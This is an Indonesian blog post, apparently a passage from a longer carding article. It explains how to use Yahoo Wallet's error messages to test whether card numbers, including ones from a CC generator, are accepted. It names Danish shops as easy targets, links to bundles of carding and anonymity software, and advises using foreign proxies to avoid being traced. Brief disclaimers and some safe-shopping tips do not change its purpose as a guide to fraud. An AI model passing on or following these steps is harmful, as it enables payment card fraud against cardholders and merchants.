Yahoo Wallet, tentu saja seseorang diwajibkan memiliki email di Yahoo. Barulah setelah itu melakukan register di http://wallet.yahoo.com</span><br /><span style="font-size:100%;">Setelah Anda berhasil login, klik pada bagian add a new payment method.</span><br /><span style="font-size:100%;">Sekarang, masukkanlah data mengenai nomor kartu kreditnya.</span><br /><span style="font-size:100%;">Data yang saya coba masukkan sebagai contoh adalah nomor yang sudah expire. Dan sengaja saya melakukan sebuah kesalahan dengan memilih kartu MasterCard, padahal sebenarnya ini Visa.</span><br /><span style="font-size:100%;">Tujuan saya adalah untuk menunjukkan kepada Anda, bahwa sebuah kesalahan bukan berarti kegagalan. Sekarang Anda klik tombol continue. Hasilnya biasanya akan berupa pesan seperti:</span><br /><br /><span style="font-size:100%;">Please correct the following problems:</span><br /><span style="font-size:100%;">- Credit Card Number (MasterCard numbers need to start with the number 5)</span><br /><br /><span style="font-size:100%;">Please correct the following problems:</span><br /><span style="font-size:100%;">- Credit Card Number (Discover Network numbers need to start with the number 6011)</span><br /><br /><span style="font-size:100%;">Please correct the following problems:</span><br /><span style="font-size:100%;">- Credit Card Number (American Express numbers need to be 15 digits)</span><br /><span style="font-size:100%;">- Credit Card Number (American Express numbers need to start with the number 3)</span><br /><br /><span style="font-size:100%;">Kartu kredit MasterCard dimulai dengan angka 5. Jadi, hal ini bisa diujicobakan untuk jenis kartu lainnya, boleh dibilang ini adalah salah satu metode untuk mengetahui prefix, yang sudah dibahas sebelumnya.</span><br /><span style="font-size:100%;">Apabila yang muncul pesan invalid, error seperti pada contoh berikut, maka itu berarti kartu tersebut tidak dapat digunakan.</span><br /><br /><span style="font-size:100%;">Unfortunately, there was a problem.</span><br /><span style="font-size:100%;">- Invalid credit card number or type, please check and try again.</span><br /><br /><span style="font-size:100%;">There is an error with the payment method information. Please check the information and re-enter it or use another payment method. If the problem persists, please contact Yahoo! Customer Care.</span><br /><br /><span style="font-size:100%;">Bisa juga seperti berikut:</span><br /><br /><span style="font-size:100%;">The payment method was not added. Please re-enter the information.</span><br /><br /><span style="font-size:100%;">Apabila nomor kartu kredit tersebut diterima maka akan muncul pernyataan sukses.</span><br /><span style="font-size:100%;">Berikutnya, data tersebut dapat dilakukan proses Edit untuk perubahan atau pun Delete untuk menghapusnya.</span><br /><span style="font-size:100%;">Untuk kasus tertentu, misalnya nomor kartu kredit yang diperoleh melalui CC Generator digunakan dengan memasukkan data pemilik sembarangan.</span><br /><span style="font-size:100%;">Masih berhubungan dengan validasi kartu kredit, sekalian saja akan saya jelaskan bahwa ada banyak tools yang digunakan untuk mencari CVV sebuah kartu kredit. Tapi kebanyakan dari tools tersebut memberikan nomor CVV yang salah. Sebab setelah dicoba dengan menggunakan kartu kredit saya yang asli, ternyata kebanyakan nomornya salah. Walau demikian, pada beberapa pengujian yang telah dilakukan seperti menggunakan Yahoo Wallet di atas, CVV tersebut tetap dapat diterima oleh situs tersebut.</span><br /><span style="font-size:100%;">Berhati-hatilah Anda, apabila mencoba menggunakan berbagai program/software yang berhubungan dengan kartu kredit, karena dalam banyak kasus, sebagian besar dari tools/software tersebut disisipi trojan.</span><br /><br /><span style="font-size:100%;">LAIN-LAIN YANG PERLU ANDA TAHU.</span><br /><br /><span style="font-size:100%;">Selain permasalahan enkripsi dan pengaturan database, dalam aksinya para carder sering menggunakan proxy untuk menyembunyikan dirinya dari pendeteksi sehingga tidak mudah terlacak. Hal ini juga sudah pernah dibahas dalam artikel pada bagian awal-awal.</span><br /><span style="font-size:100%;">Sekedar tambahan, mengenai enkripsi, jika Anda memerlukan enkripsi untuk RC4, Anda bisa menuju pada link berikut:</span><br /><span style="font-size:100%;">http://www.scgi-bin.info/RC4.asp</span><br /><br /><span style="font-size:100%;">TIPS AMAN ONLINE SHOPPING.</span><br /><br /><span style="font-size:100%;">Tips untuk berbelanja online secara aman ini saya kutip dari Komisi Perdagangan Amerika:</span><br /><span style="font-size:100%;">- Selalu perhatikan kebijakan sebuah situs, apakah mereka akan memberikan atau menjual informasi Anda kepada pihak ketiga atau tidak.</span><br /><span style="font-size:100%;">- Simpanlah informasi pribadi milik Anda.</span><br /><span style="font-size:100%;">- Rahasiakan password Anda.</span><br /><span style="font-size:100%;">- Jika ragu tidak mendapatkan barang dari situs yang tidak jelas, jangan bayar menggunakan kartu kredit. Dan apabila ada kejanggalan dalam tagihan kartu kredit Anda, segera konfirmasikan dengan pihak bank.</span><br /><span style="font-size:100%;">- Periksalah kebijakan pengiriman dan pengembalian perusahaan tersebut.</span><br /><span style="font-size:100%;">- Pastikan bahwa bertransaksi pada situs tersebut aman sebelum membeli barang apapun.</span><br /><br /><span style="font-size:100%;">Untuk melengkapi tips tersebut, saya tambahkan beberapa tips lainnya yang juga penting untuk diperhatikan:</span><br /><span style="font-size:100%;">- Sebisa mungkin pastikan dimana lokasi fisik toko tersebut berada, baik alamat dan nomor teleponnya.</span><br /><span style="font-size:100%;">- Berhati-hatilah saat Anda diminta memberikan informasi pribadi, seperti nomor kartu kredit, nomor rekening bank, nomor KTP, nama ibu kandung, dan sejenisnya.</span><br /><span style="font-size:100%;">- Untuk toko online, perhatikanlah sistem keamanan yang mereka miliki. Menurut pengalaman, biasanya toko yang baik menggunakan sistem keamanan yang ketat. Salah satu indikatornya adalah dengan memperhatikan alamat web-nya. Protokol https:// lebih aman ketimbang yang http:// (s pada bagian https berarti Secure).</span><br /><span style="font-size:100%;">- Jika Anda memiliki pengetahuan yang baik mengenai komputer, perhatikan pula sertifikat digital yang dimiliki oleh situs tersebut.</span><br /><span style="font-size:100%;">- Carilah informasi nama ekspedisi yang biasa digunakan untuk pengiriman barang oleh toko online tersebut. Biasanya situs palsu akan mengaku bahwa mereka menggunakan ekspedisi ABC dan sudah menjadi pelanggan tetap. Sebaiknya Anda mencoba menghubungi pihak ekspedisi ABC tersebut apakah benar toko online yang dimaksud telah bekerjasama dengan mereka.</span><br /><span style="font-size:100%;">Khusus bagi Anda para pemilik toko online (dalam hal ini adalah yang jujur), sebisa mungkin Anda pun menerapkan sebuah aturan yang jelas, untuk menghindari tindakan para carder. Contohnya adalah pengiriman barang akan dilakukan setelah uang diterima.</span><br /><span style="font-size:100%;">Jika toko online Anda bekerjasama dengan pihak lain untuk menerima pembayaran dalam bentuk kartu kredit, pastikanlah bahwa perusahaan tersebut memiliki sistem keamanan yang baik dan dapat dipercaya. Terakhir, sering-seringlah melakukan audit terhadap sistem yang Anda miliki. Dan jangan lupa sebuah aturan kuno, sering-seringlah mengupdate aplikasi online shopping yang Anda gunakan.</span><br /><br /><span style="font-size:100%;">CC VIRTUAL.</span><br /><br /><span style="font-size:100%;">Pada bagian awal telah disinggung mengenai CC Generator, sekarang ada lagi istilah yaitu CC Virtual. Nah, ayo apa maksudnya?</span><br /><span style="font-size:100%;">CC Virtual adalah singkatan dari kartu kredit virtual. Sebenarnya ini adalah salah satu metode untuk pengamanan kartu kredit sewaktu berbelanja online. Hal ini pula yang menyebabkan mengapa ada kartu kredit yang kelihatan masih fresh ternyata sudah tidak bisa digunakan lagi. Hal ini juga sekaligus sebagai jawaban tambahan mengapa ada nomor kartu kredit yang tidak valid saat digunakan, walaupun masa pakainya masih lama dan datanya lengkap.</span><br /><span style="font-size:100%;">Prinsip kerja CC Virtual akan saya jelaskan sebagai berikut:</span><br /><span style="font-size:100%;">User melakukan Sign-Up dan mengakses kartu kredit milik perusahaan situs tersebut. Selanjutnya user memasukkan data-data, seperti jumlah uang dan validitas pembayaran. Kemudian perusahaan membuatkan sebuah kartu kredit sekali pakai yang hanya sah untuk satu kali transaksi saja (CC Virtual). Selanjutnya user menggunakan kartu kredit virtual tersebut untuk melakukan transaksi. Setelah data diterima oleh pihak toko online, maka mereka mengirim verifikasi pada perusahaan penyedia kartu kredit virtual milik user. Setelah transaksi berhasil dijalankan, maka nomor kartu kredit virtual yang telah digunakan tersebut dimusnahkan, sehingga walaupun ditemukan oleh para carder sekalipun nomor itu sudah tidak bisa dipakai lagi. Nomor kartu kredit virtual tersebut akan berbeda untuk setiap kali transaksi.</span><br /><span style="font-size:100%;">Nomor yang sudah digunakan tersebut banyak ditemukan melalui file log oleh carder. Teknik ini pula yang menyebabkan banyak carder yang tertipu karena walau sudah capek-capek berusaha mengais-ngais database di internet, tetapi kartu kredit yang ditemukan tidak bisa dipake. (Kapok, syukurin, siapa suruh jadi maling! Kacian deh, lo...)</span><br /><br /><span style="font-size:100%;">Sebenarnya kalau teknik di atas gagal, para carder biasanya tidak mudah putus asa. Mereka bisa mencoba menggunakan berbagai software carding, maupun credit card generator. Walau banyak situs e-commerce di Amerika, Eropa maupun Australia yang menolak credit card hasil generator beserta CVV-nya, namun ternyata masih ada beberapa situs e-commerce di Denmark yang dengan mudah ditembus dengan menggunakan Credit Card Generator maupun aneka tools carding. Ini menurut pengakuan beberapa hacker dan carder asal Rusia dan bekas negara-negara Eropa Timur lainnya. Mengenai kebenarannya, Wallahualam (tidak ada yang tahu), karena penulis tidak pernah mencobanya. Bagi yang pengin mencoba, silakan saja, namun resiko Anda tanggung sendiri. Tulisan ini hanyalah sekedar ilmu pengetahuan saja untuk diketahui, dan bukannya untuk disalahgunakan. Untuk yang tertarik untuk mendownload aneka software carding, Anda bisa mendownloadnya di link yang saya sediakan di bawah ini. Bagi yang punya aneka software lainnya, Anda bisa share dengan para pembaca yang lain dengan menuliskan link downloadnya di bagian komentar dari artikel ini. Software-software buatan komunitas underground memang begitu banyak dijumpai di pasaran, namun biasanya update nya cepat sekali, dan banyak diantaranya yang berbayar. Salah satu software yang ada dalam bundle software yang saya dapatkan ini ternyata ada yang masih belum bisa digunakan karena masih harus memasukkan password di dalamnya (yang hanya bisa digunakan dengan membeli password dari pembuatnya). Bagi yang bisa mengcrack atau menemukan password yang tepat untuk membuka salah satu software tersebut, silakan Anda share di bagian komentar dari artikel ini. Selamat belajar dan mempelajari kinerja aneka software berikut:</span><br /><span style="font-size:100%;">Link download software carding ada di:</span><br /><span style="font-size:100%;">http://www.ziddu.com/download/1857011/CARDING_SOFTWARES.zip.html</span><br /><span style="font-size:100%;">Bila Anda nekad untuk melakukan uji coba mengenai kehandalan software-software di atas dan menerapkannya di berbagai situs e-commerce, khususnya yang berada di negara Denmark, sebaiknya Anda menggunakan proxy dari negara lain, sehingga Anda akan lebih aman, dan terlebih lagi agar tidak mencemarkan nama negara kita, Indonesia, yang sudah tercemar begitu rupa. Bukankah Anda mencintai negara ini, kalau begitu jangan cemari nama baik negeri ini dengan tindakan tercela.</span><br /><span style="font-size:100%;">Atau bila Anda kesulitan menemukan proxy yang bagus, Anda bisa mencoba menginstal software-software anonymous surfing berikut ini, yang bisa Anda download, lalu Anda install di komputer Anda. Tindakan hacking Anda akan lebih aman dan terkendali. :)</span><br /><span style="font-size:100%;">Berikut link download software bundle anonymous surfing yang bisa Anda download:</span><br /><span style="font-size:100%;">http://www.ziddu.com/download/1865627/ANONYMOUSSURFING.zip.html</span><br /><span style="font-size:100%;">Tapi sekali lagi, tidak disarankan, karena kalian harus tahu bahwa kegiatan carding dan hacking itu lebih banyak dosanya daripada manfaatnya. Lagi pula Indonesia sudah tercemar namanya karena mayoritas carder dan hacker yang mengoprek jagat maya berasal dari Indonesia, Cina dan Rusia. Weleh weleh weleh...</span><br /><span style="font-size:100%;">Makanya, kalo cari duit yang halal, misalnya ikutan aneka program afiliasi atau PPC di internet yang seratus persen duit yang diterima bakalan halal, barokah dan toyibah, ya nggak?</span><br /></div>wendysuharmokohttp://www.blogger.com/profile/06692930739487726756noreply@blogger.com0